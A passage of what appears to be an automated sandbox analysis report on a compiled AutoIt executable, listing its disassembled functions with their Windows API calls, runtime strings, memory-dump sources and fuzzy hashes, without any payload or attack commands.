                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                          • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                          • String ID: .dll$.exe$.icl$Wu
                                                                                          • API String ID: 2511167534-3157294790
                                                                                          • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                          • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                          • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                          • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                          Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                          • _wcslen.LIBCMT ref: 00436B79
                                                                                          • _wcscpy.LIBCMT ref: 00436B9F
                                                                                          • _wcscat.LIBCMT ref: 00436BC0
                                                                                          • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                          • _wcscat.LIBCMT ref: 00436C2A
                                                                                          • _wcscat.LIBCMT ref: 00436C31
                                                                                          • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                          • _wcsncpy.LIBCMT ref: 00436C62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                          • API String ID: 1503153545-1459072770
                                                                                          • Opcode ID: 1bca29e3adc21336a21f3c01565ed382529ec8d4b1eae201a388b16e544b708b
                                                                                          • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                          • Opcode Fuzzy Hash: 1bca29e3adc21336a21f3c01565ed382529ec8d4b1eae201a388b16e544b708b
                                                                                          • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                          Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                          • _fseek.LIBCMT ref: 004527FC
                                                                                          • __wsplitpath.LIBCMT ref: 0045285C
                                                                                          • _wcscpy.LIBCMT ref: 00452871
                                                                                          • _wcscat.LIBCMT ref: 00452886
                                                                                          • __wsplitpath.LIBCMT ref: 004528B0
                                                                                          • _wcscat.LIBCMT ref: 004528C8
                                                                                          • _wcscat.LIBCMT ref: 004528DD
                                                                                          • __fread_nolock.LIBCMT ref: 00452914
                                                                                          • __fread_nolock.LIBCMT ref: 00452925
                                                                                          • __fread_nolock.LIBCMT ref: 00452944
                                                                                          • __fread_nolock.LIBCMT ref: 00452955
                                                                                          • __fread_nolock.LIBCMT ref: 00452976
                                                                                          • __fread_nolock.LIBCMT ref: 00452987
                                                                                          • __fread_nolock.LIBCMT ref: 00452998
                                                                                          • __fread_nolock.LIBCMT ref: 004529A9
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                          • __fread_nolock.LIBCMT ref: 00452A39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                          • String ID:
                                                                                          • API String ID: 2054058615-0
                                                                                          • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                          • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                          • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                          • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                          Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: b9da739ef4394ef292cf8eb25369925a80ec30f337521dada9f854f90e9bbf21
                                                                                          • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                          • Opcode Fuzzy Hash: b9da739ef4394ef292cf8eb25369925a80ec30f337521dada9f854f90e9bbf21
                                                                                          • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                          Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                          • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                          • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                          • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                          • GetClientRect.USER32(?,?), ref: 00470371
                                                                                          • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                          • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                          • String ID: AutoIt v3 GUI
                                                                                          • API String ID: 867697134-248962490
                                                                                          • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                          • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                          • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                          • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                          Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window
                                                                                          • String ID: 0
                                                                                          • API String ID: 2353593579-4108050209
                                                                                          • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                          • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                          • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                          • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                          Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSysColor.USER32 ref: 0044A11D
                                                                                          • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                          • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                          • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                          • GetWindowDC.USER32 ref: 0044A277
                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                          • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                          • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                          • String ID:
                                                                                          • API String ID: 1744303182-0
                                                                                          • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                          • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                          • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                          • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                          Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll$__wcsnicmp
                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                          • API String ID: 790654849-1810252412
                                                                                          • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                          • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                          • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                          • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                          Function 0046CAAA Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 229COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                          • API String ID: 0-1896584978
                                                                                          • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                          • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                          • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                          • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                          Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1927566239-0
                                                                                          • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                          • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                          • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                          • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                          Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                          • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                          • IsWindow.USER32(?), ref: 0046DBDE
                                                                                          • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                          • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                          • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                          • API String ID: 1322021666-1919597938
                                                                                          • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                          • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                          • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                          • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                          Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll$IconLoad
                                                                                          • String ID: blank$info$question$stop$warning
                                                                                          • API String ID: 2485277191-404129466
                                                                                          • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                          • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                          • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                          • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                          Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                          • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                          • strncnt.LIBCMT ref: 00428646
                                                                                          • strncnt.LIBCMT ref: 0042865A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: strncnt$CompareErrorLastString
                                                                                          • String ID:
                                                                                          • API String ID: 1776594460-0
                                                                                          • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                          • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                          • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                          • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                          Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                          • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                          • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                          • SetWindowTextW.USER32(?,?), ref: 004546FD
